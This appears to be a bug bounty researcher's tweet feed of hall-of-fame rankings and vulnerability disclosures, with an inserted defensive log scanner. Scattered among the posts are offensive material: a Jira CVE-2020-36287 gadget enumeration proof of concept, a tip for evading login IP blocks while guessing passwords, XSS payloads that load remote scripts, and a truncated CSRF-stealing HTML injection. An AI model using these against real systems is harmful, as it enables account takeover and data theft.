The first Jordanian in Google's Hall of Fame
@GoogleVRP has added my name to the Hall of Fame (HOF) dedicated to vulnerability finders in its Bughunter program, and I ranked "204" worldwide out of 1300 security researchers. With just one vulnerability I am now at the forefront of the list.
https://t.co/meVB4gWTH8
Jafar Abo Nada, a Jordanian hacker
This Jordanian guy reported 6 security vulnerabilities in Google
and as a result he signed a contract with Facebook, and for three years
he was on the honor list, and he reported 25 vulnerabilities in Facebook
https://t.co/5nPHhl3hf5
@Jafar_Abo_Nada
All followers of the Update channel can now join the channel's membership program to get exclusive content, interviews and consultations.
https://t.co/dH0EA86nlg
Thank God, I am proud to be [Ranked 5th] in the world among the #Top_10 security researchers in the month of [May/2021] on the [Bugcrowd Leaderboard]
Check out the @bugcrowd top 10: https://t.co/GRCesYoypc
MY BC Account:
https://t.co/U6VQMxIRin
#kickass #ItTakesACrowd
Rank 5th at 🛡️ [Atlassian bug bounty program] 🛡️
Thank God, extremely happy and proud to announce that I have been listed among the #TOP_10 security researchers in the world on the [@Atlassian Hall Of Fame]
MY BC Account: https://t.co/U6VQMxIRin
#BugBounty #bug
This is an exploit for a bug that I discovered in Jira
PoC CVE-2020-36287
Brute Force <GadgetId> start from 10000 to 19999
{BaseUrl}/rest/dashboards/1.0/10000/gadget/<GadgetId>/prefs
If the server responds with 401, the bug is fixed. If the server's response is 200, the response will contain XML data.
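A defender-side check for the enumeration pattern in the PoC above, as an added example that is not part of the original tweet: it scans access logs for clients that request many distinct gadget ids on the prefs endpoint without a session, and lists the ids that were answered with 200. The combined-log layout, the threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Endpoint shape taken from the PoC above; the log layout is an assumption
# (combined-log style, third field "-" when the request carries no user).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"GET \S*/rest/dashboards/1\.0/\d+/gadget/(?P<gid>\d+)/prefs\S* HTTP/[\d.]+" '
    r'(?P<status>\d{3}) '
)

def find_gadget_enumeration(lines, min_distinct_ids=10):
    """Return {ip: {"ids": n, "exposed": [gadget ids answered 200]}} for
    clients that requested many distinct gadget ids without a session."""
    seen = defaultdict(set)      # ip -> distinct gadget ids requested
    exposed = defaultdict(set)   # ip -> gadget ids that came back 200
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["user"] != "-":   # only unauthenticated requests matter
            continue
        gid = int(m["gid"])
        seen[m["ip"]].add(gid)
        if m["status"] == "200":        # 200 means prefs XML was served
            exposed[m["ip"]].add(gid)
    return {
        ip: {"ids": len(ids), "exposed": sorted(exposed[ip])}
        for ip, ids in seen.items()
        if len(ids) >= min_distinct_ids
    }

def build_sample_log():
    """Constructed log lines: one client walking ids, one logged-in user."""
    fmt = ('{ip} - {user} [01/Jan/2021:10:00:{s:02d} +0000] '
           '"GET /rest/dashboards/1.0/10000/gadget/{gid}/prefs HTTP/1.1" {st} 512')
    lines = [fmt.format(ip="198.51.100.7", user="-", s=i, gid=10000 + i,
                        st=200 if i in (3, 8) else 404) for i in range(12)]
    lines += [fmt.format(ip="203.0.113.20", user="alice", s=30 + i, gid=10003,
                         st=200) for i in range(3)]
    return lines

if __name__ == "__main__":
    for ip, hit in find_gadget_enumeration(build_sample_log()).items():
        print(ip, hit)
```

Any id in the "exposed" list means the instance still answers unauthenticated prefs requests and needs the vendor fix; an empty list with a high id count is scanning against a patched server.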
We just disclosed this beautifully written report and proof of concept from @Jafar_Abo_Nada: https://t.co/YpGN6ATT95. Especially appreciated the additional feedback we got after mitigating the initial vulnerability. It’s worth reading!
Thank God, extremely happy and proud to announce that I am listed in the #TOP_10 on the @Bugcrowd Leaderboard for the month of March/2020.
Praise be to God, with God's help and after a month full of competition, I am proud to be listed in the Top_10 on the [Bugcrowd Leaderboard] for the month of March
https://t.co/IH1BprIsH7
Thank God, I got an acknowledgement from @Hacker0x01 after I discovered a bug in the integration process on the H1 platform. The #bug was found as a result of a mistake in the authorization configuration, which leads to the leakage of the JWT token to an unauthorized user
Big Thanks: @jobertabma
Thank God, I got acknowledged by @Atlassian after discovering a security issue in Jira Cloud. Bug type: #SXSS. This would allow a malicious app to bypass the sandbox (as the XSS fires within the host app), and an attacker can use this #bug with non-malicious apps as an #XSS vector.
Third bug in Twitter.
Tips
You are trying to guess the password on the login page, but the IP was blocked after several attempts
1. Bypass. Go to Amazon, create account.
2. From EC2 API Gateway get secret/access key
3. In Burp Pro install IP Rotate and paste AWS key.
Run attack. enjoy.
#XSS short payload, 19 chars, using #Punycode attack & without space
XSS vector using emoji Punycode
<img/src=//🤣.io>
<iframe/src=//l❤️.io>
<script/src=//㎠.㎺>
It's auto translated to https://t.co/h3oFTZXucu by browsers
HTML injection to steal CSRF token/attack.
<img/src='//x.me